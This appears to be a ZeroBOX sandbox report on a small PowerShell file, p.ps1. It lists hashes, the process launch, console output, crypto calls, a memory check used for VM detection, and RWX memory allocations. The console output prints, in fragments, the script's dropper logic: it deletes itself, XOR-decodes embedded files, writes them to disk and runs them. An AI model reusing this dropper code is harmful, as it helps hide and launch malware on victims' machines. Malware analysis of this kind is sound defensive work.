Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 30, 2024, 9:48 a.m.	July 30, 2024, 9:50 a.m.

Size	1.5KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`35331e753312b7f595f0b07a6307b2ef`
SHA256	`32b5349b811b91ddc26c72845b844ae671b0dc0740077325a46ac28df2e96f2c`
CRC32	`7D030EA6`
ssdeep	`48:ofoTpaWbYEWyfApuxPekIDwJyWfcfJyVX:oQ97WyscIkJeyJ`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\p.ps1
1044

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: Remove-Item : Cannot find path 'C:\programdata\p.ps1' because it does not exist console_handle: 0x00000023	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: At line:1 char:12 console_handle: 0x0000003b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + Remove-Item <<<< 'c:\\programdata\\p.ps1';$f = gc $m -Encoding Byte; $fSize console_handle: 0x00000047	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: = $f.count;$i=$o; while($i -lt $fSize){$bXor=$f[$i];$flag=$f[$i+1];$dwPathLen=[ console_handle: 0x00000053	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: bitconverter]::ToInt32($f, $i+2);$dwDataLen=[bitconverter]::ToInt32($f, $i+6);$ console_handle: 0x0000005f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: fi=10; if($flag -eq 2){$i=$i+$fi+$dwPathLen+$dwDataLen;continue;};if($bXor -ne console_handle: 0x0000006b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: 0){for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dwDataLen); $p++){ $f[$p console_handle: 0x00000077	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: ] = $f[$p] -bxor $bXor}};[byte[]]$pathHex = $f[($i+$fi)..($i+$fi+$dwPathLen-1)] console_handle: 0x00000083	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: ;$path = [System.Text.Encoding]::ASCII.GetString($f[($i+$fi)..($i+$fi+$dwPathLe console_handle: 0x0000008f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: n-2)]); sc $path ([byte[]]($f \| select -Skip ($i+$fi+$dwPathLen) \| select -Skip console_handle: 0x0000009b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: Last ($fSize-$i-$fi-$dwPathLen-$dwDataLen))) -Encoding Byte;if($flag){&$path;}$ console_handle: 0x000000a7	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: i=$i+$fi+$dwPathLen+$dwDataLen;} console_handle: 0x000000b3	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\programdata\p.ps1:String) [R console_handle: 0x000000bf	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: emove-Item], ItemNotFoundException console_handle: 0x000000cb	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.Remov console_handle: 0x000000d7	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: eItemCommand console_handle: 0x000000e3	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: Get-Content : Cannot bind argument to parameter 'Path' because it is null. console_handle: 0x00000103	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: At line:1 char:45 console_handle: 0x0000010f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + Remove-Item 'c:\\programdata\\p.ps1';$f = gc <<<< $m -Encoding Byte; $fSize console_handle: 0x0000011b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: = $f.count;$i=$o; while($i -lt $fSize){$bXor=$f[$i];$flag=$f[$i+1];$dwPathLen=[ console_handle: 0x00000127	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: bitconverter]::ToInt32($f, $i+2);$dwDataLen=[bitconverter]::ToInt32($f, $i+6);$ console_handle: 0x00000133	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: fi=10; if($flag -eq 2){$i=$i+$fi+$dwPathLen+$dwDataLen;continue;};if($bXor -ne console_handle: 0x0000013f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: 0){for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dwDataLen); $p++){ $f[$p console_handle: 0x0000014b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: ] = $f[$p] -bxor $bXor}};[byte[]]$pathHex = $f[($i+$fi)..($i+$fi+$dwPathLen-1)] console_handle: 0x00000157	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: ;$path = [System.Text.Encoding]::ASCII.GetString($f[($i+$fi)..($i+$fi+$dwPathLe console_handle: 0x00000163	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: n-2)]); sc $path ([byte[]]($f \| select -Skip ($i+$fi+$dwPathLen) \| select -Skip console_handle: 0x0000016f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: Last ($fSize-$i-$fi-$dwPathLen-$dwDataLen))) -Encoding Byte;if($flag){&$path;}$ console_handle: 0x0000017b	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: i=$i+$fi+$dwPathLen+$dwDataLen;} console_handle: 0x00000187	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + CategoryInfo : InvalidData: (:) [Get-Content], ParameterBinding console_handle: 0x00000193	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: ValidationException console_handle: 0x0000019f	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,M console_handle: 0x000001ab	1	1
WriteConsoleW July 30, 2024, 9:48 a.m.	buffer: icrosoft.PowerShell.Commands.GetContentCommand console_handle: 0x000001b7	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 30, 2024, 9:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055add0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 30, 2024, 9:48 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (20 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05356000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05531000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05533000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05357000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05534000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05535000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06370000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06511000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06513000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06514000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05341000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 30, 2024, 9:48 a.m.	process_identifier: 1044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

p.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All